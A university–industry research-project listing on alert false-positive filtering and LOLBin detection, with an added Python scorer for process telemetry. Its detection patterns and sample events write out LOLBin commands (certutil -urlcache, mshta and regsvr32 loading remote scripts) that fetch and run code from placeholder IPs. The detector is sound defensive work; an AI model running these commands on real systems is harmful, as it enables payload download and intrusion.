Automated False Positive Filtering for esNetwork Alerts and Lolbin Detection for Raw Endpoint Telemetry

Pipeline alerts help analysts determine where their attention is needed. However, a high false positive rate produces a noisy alert stream and wastes analyst time. The first sub-project aims to classify each alert as having a low or high likelihood of being a false positive, so that analysts can spend their time where it is most effective.
Abuse of living-off-the-land binaries (LOLBins) is an increasingly common attacker technique, yet there is currently little detection for it. The second sub-project will fill that gap by providing automated detection of LOLBin abuse in raw endpoint telemetry, raising the detection rate beyond what out-of-the-box detection can achieve.
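As an added illustration of the kind of detection the second sub-project describes (this is example code written for this page, not eSentire's or the project's own), the scorer below runs over process-creation telemetry and flags LOLBin abuse by combining command-line patterns with process-tree context (an Office application spawning a system utility) and file-location context (a copy of the binary running outside its normal directory), which are the signals that stock command-line rules tend to miss. The event schema and field names, the scoring weights, the report threshold and the sample events are all assumptions constructed for the example; the command-line patterns come from publicly documented LOLBAS techniques.

```python
"""Heuristic LOLBin-abuse detection over raw process-creation telemetry.

Added illustration, not eSentire's or the project's code. The event schema
(id, image, parent_image, command_line), the weights and the sample events
are constructed for this example.
"""
import re
from dataclasses import dataclass, field

# Abuse patterns per binary, from publicly documented LOLBAS techniques.
# Each entry is (regex over the command line, reason). Non-exhaustive.
LOLBIN_PATTERNS = {
    "certutil.exe": [(r"-urlcache\b", "remote download via certutil"),
                     (r"-decode\b", "base64 decode via certutil")],
    "regsvr32.exe": [(r"/i:\s*https?://", "remote scriptlet via regsvr32"),
                     (r"scrobj\.dll", "scriptlet execution via scrobj.dll")],
    "mshta.exe": [(r"https?://", "remote HTA execution"),
                  (r"(vbscript|javascript):", "inline script via mshta")],
    "rundll32.exe": [(r"javascript:", "inline JavaScript via rundll32")],
    "bitsadmin.exe": [(r"/transfer\b", "download via bitsadmin")],
}

# Parents that should almost never spawn these utilities directly.
SUSPICIOUS_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}

# Where the genuine binaries live; a copy elsewhere is a common evasion.
EXPECTED_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")

REPORT_THRESHOLD = 3  # assumed weight; tune against real telemetry


@dataclass
class Finding:
    event_id: str
    image: str
    score: int
    reasons: list = field(default_factory=list)


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(ev: dict):
    """Score one process-creation event; return a Finding or None if benign."""
    full_image = ev["image"].replace("/", "\\").lower()
    image = _basename(full_image)
    if image not in LOLBIN_PATTERNS:
        return None  # not a tracked LOLBin; leave it to other rules
    cmd = ev.get("command_line", "")
    parent = _basename(ev.get("parent_image", ""))
    reasons, score = [], 0
    # 1. Command-line patterns that only make sense for abuse.
    for pattern, why in LOLBIN_PATTERNS[image]:
        if re.search(pattern, cmd, re.IGNORECASE):
            reasons.append(why)
            score += 3
    # 2. Process-tree context: an Office app spawning a LOLBin is a strong
    #    signal that command-line rules alone do not capture.
    if parent in SUSPICIOUS_PARENTS:
        reasons.append(f"spawned by {parent}")
        score += 4
    # 3. Renamed or copied binary running outside its normal directory.
    if not full_image.startswith(EXPECTED_DIRS):
        reasons.append("running from non-standard path")
        score += 2
    if score < REPORT_THRESHOLD:
        return None
    return Finding(ev["id"], image, score, reasons)


def detect(events):
    """Run the scorer over a telemetry stream; highest score first."""
    findings = [f for f in (score_event(e) for e in events) if f]
    return sorted(findings, key=lambda f: f.score, reverse=True)


# Constructed sample telemetry (not real captures); IPs are documentation ranges.
SAMPLE_EVENTS = [
    {"id": "e1", "image": r"C:\Windows\System32\certutil.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": r"certutil.exe -urlcache -split -f http://198.51.100.7/a.txt C:\Users\Public\a.exe"},
    {"id": "e2", "image": r"C:\Windows\System32\certutil.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": r"certutil.exe -dump C:\certs\corp.cer"},
    {"id": "e3", "image": r"C:\Windows\System32\mshta.exe",
     "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "command_line": "mshta.exe http://203.0.113.9/x.hta"},
    {"id": "e4", "image": r"C:\Windows\System32\rundll32.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"},
    {"id": "e5", "image": r"C:\Windows\SysWOW64\regsvr32.exe",
     "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "command_line": "regsvr32.exe /s /n /u /i:https://203.0.113.9/s.sct scrobj.dll"},
    {"id": "e6", "image": r"C:\Users\Public\certutil.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": r"certutil.exe -decode C:\Users\Public\in.b64 C:\Users\Public\out.exe"},
]

if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f"{f.event_id} {f.image} score={f.score}: {'; '.join(f.reasons)}")
```

On the sample stream, the benign certutil dump (e2) and the stock rundll32 control-panel call (e4) score zero and are not reported, while the Excel-spawned regsvr32 scriptlet load (e5) ranks highest because three independent signals agree. Context signals are kept below the report threshold on their own, so a copied binary with benign arguments is not alerted by itself; that is the trade-off that keeps the false positive rate down while still catching abuse a single command-line rule would miss.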

Faculty Supervisor:

Ali Dehghantanha

Student:

Partner:

eSentire

Discipline:

Computer science

Sector:

Cyber Security; Artificial Intelligence; Technology

University:

University of Guelph

Program:

Accelerate
